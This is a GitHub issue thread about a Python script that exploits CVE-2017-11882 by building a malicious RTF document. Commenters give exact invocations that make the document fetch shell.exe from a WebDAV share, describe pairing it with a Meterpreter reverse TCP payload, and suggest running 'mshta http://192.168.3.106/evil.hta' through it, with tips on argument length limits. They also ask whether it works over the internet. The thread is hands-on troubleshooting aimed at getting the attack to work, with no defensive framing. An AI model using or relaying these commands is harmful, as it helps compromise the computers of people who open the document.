Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Script argument question #2

Open
securitaydude opened this issue Nov 22, 2017 · 4 comments
Open

Script argument question #2

securitaydude opened this issue Nov 22, 2017 · 4 comments

Comments

@securitaydude
Copy link

Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script: python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this: python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word saying could not find resource from \192.168.x.xwebdav. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?

@X0R1972
Copy link

X0R1972 commented Nov 22, 2017

Thank you guy for this question .my self i tried the same think like you...
i write the command like you but for me it simply not working .;
when i open office doc in windows nothing happens..
it coud be nice if the owner of this exploit show us the right syntax and command to use
so whe now exactly what to put in command.

@ptyin
Copy link

ptyin commented Nov 22, 2017

First thing first you should use URL instead of UNC. This URL is your server location, and the -e option should be an command(like "mshta http://192.168.3.106/evil.hta" ) under your server location. The second thing is that I think your -u and -e options are too long to use. They should be shorter than 43 bytes. (MY ENGLISH IS HORRIBLE, SORRY ABOUT THAT

@isabellah750
Copy link

isabellah750 commented Nov 23, 2017

How do you tell you server location without the ip address? Kindly help me understand how it is working. And can it work on LAN

@X0R1972
Copy link

X0R1972 commented Nov 24, 2017

another question ..i hope its not a stupid one if yes Sorry..
does this exploit work only in local or also in wan ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants